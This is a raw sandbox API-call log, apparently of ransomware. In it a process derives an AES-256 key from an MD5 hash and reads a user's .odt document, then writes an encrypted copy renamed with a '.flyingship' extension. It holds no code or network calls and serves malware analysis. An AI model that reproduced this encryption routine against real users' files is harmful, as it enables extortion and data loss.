1 [0178.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.875] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.875] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.875] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0178.876] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.876] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0178.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.878] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0178.879] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0178.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.879] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0178.879] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.879] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.879] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.879] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0178.880] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0178.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.880] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0178.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.880] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.880] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0178.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.880] CryptDestroyHash (hHash=0x90af58) returned 1 [0178.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\g4fthfjbwb6.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.881] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.881] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0178.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0178.883] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm")) returned 0x10 [0178.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0178.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0178.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\g4fthfjbwb6.flyingship.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0178.886] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0178.886] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x108d, lpOverlapped=0x0) returned 1 [0178.888] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0178.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x108d) returned 0x9004b0 [0178.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0178.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x108d) returned 0x901548 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9004b0 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.889] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x108d) returned 0x9004b0 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9004b0 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.889] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0178.890] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.890] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0178.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x108d) returned 0x9004b0 [0178.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0178.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0178.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x108d) returned 0x9025e0 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.891] 